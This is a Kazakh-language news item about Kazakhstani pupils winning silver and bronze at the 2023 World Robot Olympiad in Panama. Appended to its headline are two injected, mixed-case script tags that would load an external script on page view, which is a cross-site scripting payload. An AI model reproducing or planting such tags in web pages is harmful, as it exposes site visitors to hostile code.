ҚАЗАҚСТАНДЫҚ ОҚУШЫЛАР ПАНАМАДАҒЫ РОБОТОТЕХНИКА БОЙЫНША ДҮНИЕЖҮЗІЛІК ОЛИМПИАДАНЫҢ ЖҮЛДЕГЕРЛЕРІ АТАНДЫ<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

14.11.2023

Қазақстандық оқушылар Панама қаласында өткен World Robot Olympiad робототехника бойынша Дүниежүзілік олимпиаданың жүлдегерлері атанды. Оған әлемнің 80-нен астам елінен 10-19 жас аралығындағы 6-11 сынып оқушылары қатысты.

🎯Мақсаты-роботтарды жобалау, бағдарламалау, инженерлік ғылымдар және басқа да инновациялық білім беру технологиялары саласындағы дарынды оқушыларды анықтау және қолдау. Робототехника бойынша дүниежүзілік олимпиада қорытындысы бойынша Қазақстанның үш командасы жүлдегер атанды:

🥈2 орын (күміс) "Future Engineers" санатында – Астана қаласының 10-сынып оқушылары Аңсар Сауырбаев пен Әмір Қарабаев;

🥉3 орын (қола) "Robo Mission" санатында – Астана қаласының 8-9 сынып оқушылары Вагиз Дисембаев және Жанарыс Қапаров;

🥉3 орын (қола) "Future Engineers" санатында – 11-сынып оқушылары Максим Усольцев пен Қызылорда қаласынан Дінмұхамед Әбдиев.

Дүниежүзілік олимпиада алғаш рет 2004 жылы Сингапурда Роботтар сайысының 1-ші фестивалі ретінде өтті. Қазақстан бұл олимпиадаға 2014 жылдан бері қатысып келеді.

Просмотров: 427


Пікір қосу



Деректерді қолтаңбаға қосу